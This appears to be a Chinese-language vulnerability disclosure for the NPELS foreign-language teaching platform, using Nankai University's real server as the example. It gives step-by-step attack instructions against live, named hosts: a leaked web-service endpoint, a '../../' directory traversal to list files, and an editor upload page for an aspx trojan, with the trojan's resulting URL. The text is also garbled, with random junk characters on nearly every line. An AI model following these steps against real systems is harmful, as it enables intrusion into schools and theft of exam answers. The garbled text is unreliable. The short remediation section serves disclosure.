好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中1 ?3 y' Q3 g. w& B4 p4 c0 T( l
$ c6 w' u& [$ {! P详细说明:% y( m6 y P0 h2 D: w
9 B) N& s, ]' T6 {4 T( b4 k以南开大学的为例:
; M1 H# m' \& W' Q* jhttp://222.30.60.3/NPELS- n+ t) h* w. e' y
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
}7 Z+ O( ~8 L( X+ k$ v<setting name="Update_CommonSvr_CommonService" serializeAs="String">$ g7 e$ L$ I& y7 d
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>2 c: i& m8 a; b/ |6 G' j S/ p1 |
</setting>* ?8 z+ ]/ v4 R1 c S
及版本号
+ Y1 K- ?4 y( n+ w. f, B<add key="TVersion" value="1, 0, 0, 2187">5 g3 }) P) i+ k* H. B; I2 W2 e6 @
</add>
# m: ~1 g O7 P5 G, G/ P1 B直接访问 a% ?9 Q: b' j! v9 _ Z4 I
http://222.30.60.3/NPELS/CommonService.asmx2 z% E5 |3 G: \% E
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
+ L1 |1 k; ^$ _* X" i1 V& Bhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187' [! c B4 v I7 z- `" o2 w
进一步列目录(返回的网页很大,可以直接 wget 下来)" ~, i, \7 ^- A4 z( m5 w
http://222.30.60.3/NPELS/CommonS ... List?version=../../) h& q" D+ N, h7 b+ S+ {+ X
1 T. h+ B8 y4 N& w3 `发现
G% T/ g1 B. H& i+ U w: Hhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm7 R6 x" l4 q# f+ u
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头- w- u8 H! d, {' L* e* T3 U# f
上传后继续列目录找到木马地址直接访问即可
: |: p9 s" ~! O+ D
* U1 o8 ]8 R1 l; `OOXX
8 U9 n f8 \. f
6 K8 r) m9 n7 }3 I" FGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
2 [% X' p4 d/ P" \+ ~漏洞证明:
9 s) W5 s6 ?2 O: M 0 v) Z B4 Y/ s
列目录:
% i0 _/ ~6 E! Shttp://222.30.60.3/NPELS/CommonS ... List?version=../..// N3 ? k4 f" Z
文件上传:% D$ e/ u, n8 F4 P" L
http://222.30.60.3/npelsv/editor/editor.htm1 D) w# g; |) d1 `' |- W5 f
' Y, q/ z. [3 U2 t上传木马:% x) A8 [9 Y m2 p3 u |0 G
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
/ u5 k2 T$ t# `# `9 m4 O 9 q3 O0 d0 f$ |0 _3 a
修复方案:, G; D' \2 L& c0 {
好像考试系统必须使用 CommonService.asmx; q0 d7 ]( W, `, X9 j
最好配置文件加密或者用别的方式不让它泄露出来
. e" N$ |# ?( ?" D, z* F- @! X1 g3 }并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
# b+ d/ B) s; G$ U z- \0 Y |